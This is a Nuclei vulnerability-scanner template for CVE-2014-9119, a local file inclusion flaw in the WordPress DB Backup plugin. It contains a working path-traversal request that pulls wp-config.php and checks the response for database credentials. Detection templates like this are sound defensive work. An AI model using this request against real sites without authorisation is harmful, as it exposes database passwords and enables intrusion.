nuclei-templates/cves/2014/CVE-2014-9119.yaml

40 lines
1.2 KiB
YAML

id: CVE-2014-9119
info:
name: WordPress DB Backup <=4.5 - Local File Inclusion
author: dhiyaneshDK
severity: high
description: |
WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
reference:
- https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
- https://www.exploit-db.com/exploits/35378
- https://nvd.nist.gov/vuln/detail/CVE-2014-9119
- https://wpvulndb.com/vulnerabilities/7726
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2014-9119
cwe-id: CWE-22
tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/08/05